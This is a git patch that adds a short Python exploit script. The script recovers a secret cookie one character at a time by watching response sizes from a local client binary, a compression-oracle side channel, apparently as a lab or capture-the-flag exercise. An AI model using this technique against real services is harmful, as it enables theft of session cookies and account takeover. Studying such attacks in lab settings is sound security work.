From aeb228882f2e1cfae3495ed482afcc21bc20b893 Mon Sep 17 00:00:00 2001
From: clfreville2 <clement.freville2@etu.uca.fr>
Date: Tue, 10 Oct 2023 16:33:23 +0200
Subject: [PATCH] Add exploit script

---
 exploit.py | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 exploit.py

diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..78a3091
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,29 @@
+from string import ascii_lowercase, ascii_uppercase, digits
+from subprocess import check_output
+
+alphabet = ascii_lowercase + ascii_uppercase + digits
+env = {
+    "LD_PRELOAD": "..."
+}
+
+def request(url: str) -> int:
+    """Executes the client binary with the following URL, and checks its output."""
+    out = check_output(["./client", "127.0.0.1", "8080", url], env=env).decode('utf-8')
+    return int(out.split(' ')[1])
+
+
+if __name__ == '__main__':
+    cookie = ''
+    best_len = request('flag=' + cookie)
+
+    while True:
+        for c in alphabet:
+            current = request('flag=' + cookie + c)
+            if current <= best_len:
+                cookie += c
+                best_len = current
+                print(f'Found one byte in cookie: {cookie}')
+                break
+        else:
+            print(f'Found complete cookie: {cookie}')
+            break